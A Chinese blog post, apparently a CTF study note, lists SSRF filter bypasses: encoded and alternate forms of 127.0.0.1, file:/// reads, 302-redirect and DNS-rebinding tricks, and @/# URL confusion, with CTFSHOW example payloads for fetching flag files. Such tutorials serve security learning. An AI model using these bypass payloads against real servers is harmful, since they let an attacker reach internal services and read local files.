CTF之SSRF常见绕过

最新推荐文章于 2024-04-22 14:07:29 发布
最新推荐文章于 2024-04-22 14:07:29 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: ctf 文章标签: php ctf ssrf 绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/130344397
版权

1.绕过localhost和127.0.0.1

当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过

http://0x7F.0.0.1	//16进制
http://0177.0.0.1	//8进制
http://2130706433	//10进制整数格式
http://0x7F000001	16进制整数格式
http://127.1	//省略模式
http://127.127.127.127	//用CIDR绕过localhost
http://0	//特殊地址0
http://0.0.0.0
http://[::1]	//ipv6回环地址

ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan
进制转换:https://www.sojson.com/hexconvert.html

2.CTFSHOW例题:

2.1 直接利用SSRF漏洞进行本地读取flag:

Payload:url=http://127.0.0.1/ctf/ssrf/flag.php
Payload:url=file:///C:/phpstudy/phptutorial/www/ctf/ssrf/1.txt

在这里插入图片描述
2.2 绕过localhost和127.0.0.1

Payload:url=http://127.127.127.127/ctf/ssrf/flag.php

在这里插入图片描述
2.3 绕过localhost和0和1
(1)DNS重绑定:

http://test.com ——> 127.0.0.1

公共域名解析到127.0.0.1:

https://blog.csdn.net/lovelyelfpop/article/details/107306577

(2)302跳转:

header("Location:http://127.0.0.1/flag.php");

Payload:url=http://safe.taobao.com/ctf/ssrf/flag.php

在这里插入图片描述
2.4 绕过限定的URL
URL中#、@的妙用:

例:https://www.baidu.com#www.qq.com
https://www.baidu.com@www.qq.com
http://www.baidu.com@www.qq.com  //实则访问www.qq.com
http://www.baidu.com#www.qq.com  //实则访问www.baidu.com

Payload:url=http://ctf.@127.0.0.1/ctf/ssrf/flag.php#show

在这里插入图片描述

Beyond My
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF常见密码学攻击手法和实现.md
10-24
CTF-crypto-入门-密码学
ssrf绕过技巧
haozhe6666的博客
09-14 237
今天与大家分享的是ssrf的绕过技巧,在未来的某一天,观众老爷们会不会有疑问,为啥我大部分发的都是概念性的东西,实战很少。其实这个问题很好回答,如果你们实战遇到问题了,可以去看看重楼学网安和徐长卿学网安,这两位都是很好的网安方面的博主,可能你们觉得我是在商业互吹,但我还是要说他们的帖子是有真东西的,确确实实能学到东西,而且很细致。开玩笑没关系,但是切记言多必失。世间一个个文字,是有力量的。字眼组合成词,词汇串联成句,语句契合成文章。大道就在其中。--《剑来》
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
CTF之二维码扫描.7z
12-02
CTF入门之二维码扫描神器,支持二维码修复
CTF常见加密之日历密码加解密工具
09-07
某次CTF比赛遇到了日历密码的题目,因为比赛时没有找到类似工具,感觉人工解密还是需要一定时间的,赛后写了一个小工具,可以快速解密日历密码。 运行 CalendarCryptoTool.jar 文件,输入密文、密钥,点击解密即可。 明文:小写英文字母 密文:日历密码的密文格式,中间用空格分隔 密钥:某年某月,格式为yyyyMM (1)数字1-26对应a-z共26个英文字母,因此日历密码只能加密英文字母,并且不区分大小写; (2)M、T1、W、T2、F、S1、S2 分别代表周一到周日七天(英文首字母代替,首字母相同的星期使用1或2来区分); (3)密钥为某年某月,即该月的日历为密码表,某天对应的日期为明文。
SSRF漏洞学习
qq_62078839的博客
04-23 2493
SSRF漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一个由攻击者构造请求,在目标服务端执行的一个安全漏洞。攻击者可以利用该漏洞使服务器端向攻击者构造的任意域发出请求,目标通常是从外网无法访问的内部系统。简而言之就是以服务器的身份来执行请求。 常见利用方式 伪协议读取文件 伪协议读取文件,在SSRF中常用的伪协议就是file:///协议 /?url=file:///var/www/html/flag.php 内网访问 我们从目标主机内
八、漏洞原理利用(4)SSRF 笔记和靶场
weixin_45540609的博客
05-08 414
一、SSRF 服务端请求伪造 用户对A网站传参,访问B网页 用户可以控制A网站发起网络请求 eg:翻译网页 1、通过JS把整个页面需要翻译的东西给翻译网站,翻译后还给用户。 http://web.yeekit.com/ 两个得到的ip都是一样的 2、翻译网站直接帮你翻译,得到结果后给你。 得到的ip不同 3、作用 操作服务器发起网络请求 1、可以做攻击其他人的跳板 2、可以杀入内网 192.168.1.1 3、可以杀入本机 127.0.0.1 ...
SSRF的详解、复现与CTF下的SSRF
sGanYu
12-11 6353
借鉴于教父爱分享 SSRF 由攻击者构造,服务器端发起请求的安全漏洞,漏洞属于信息泄露的一种。 一般情况下,SSRF的攻击目标大多是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。 SSRF形成的原因 大多数都是由服务端提供了从其他服务器应用获取数据的操作,且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片文档等等 举个例子:假设现在有两个网站
File Inclusion
angry_program的博客
02-05 212
前言 在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。 详见:漏洞之文件包含漏洞 下面分别分析四种级别的文件包含漏洞: Low 服务端核心代码: <?php // The page we wish to di...
ctfshow web入门 SSRF
Sentiment的博客
12-09 679
web351
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
CTF常见密码总结.docx
04-10
ctf解题中总结的一些实用的密码(编码方式),非常适合刚入坑的新手参考学习。比如常见的栅栏密码,摩斯电码,还有一些不常见的比如培根密码等等等等,非常全面!!!
第三章 web进阶n1book
qq_51558360的博客
03-07 685
[第三章 web进阶]Python里的SSRF 直接按照提示来: 127.0.0.1是被禁止的 用0.0.0.0代替127.0.0.1就是成功了, 127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1过滤。 本题有多重解法 - `0.0.0.0:8000` 绕过 - `[::1]:8000` 绕过(需要支持 ipv6) - 重定向跳转到 `127.0.0.1:8000` - dns rebinding 输入一个域名,第
Day7SSRF绕过
Panacea
10-07 166
本地地址绕过 使用localhost或者[::]替换127.0.0.1 @ http://www.baidu.com@127.0.0.1/index.html = http://127.0.0.1/index.html 短网址绕过 使用网址生成一个短网址 http://suo.im/6b4B5R = http://127.0.0.1/index.html 指向任意IP的域名xip.io http://127.0.0.1.xip.io/index.html = http://127.0.0.1/index.h
SSRF(9)数字IP Bypass
m0_64417923的博客
05-21 676
题目描述:这次ban掉了127以及172,不能使用点分十进制的IP了,但是又要访问127.0.0.1,该怎么办呢? 先构造: /?url=http://127.0.0.1/flag.php 得到 发现127以及172被ban了,所以根据题目描述尝试绕过127.0.0.1绕过127.0.0.1的方法有很多 一,利用进制的转换 可以使用一些不同的进制替代ip地址,从而绕过WAF 搜索找到了一个一键转换的php脚本 <?php $ip = '127.0.0.1'; $ip =.
从一文中了解SSRF的各种绕过姿势及攻击思路
quan9i的博客
07-31 2474
SSRF之前只有简单了解,进行二次学习后简单总结一下,希望能对正在学习SSRF的师傅们有所帮助。
CTF之web学习记录 -- SSRF
lifanxin的博客
06-29 1852
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
CTFer成长之路之SSRF漏洞
众生度尽,方证菩提
02-22 646
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
最新发布
ALex_zry的博客
04-22 479
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHub—SSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值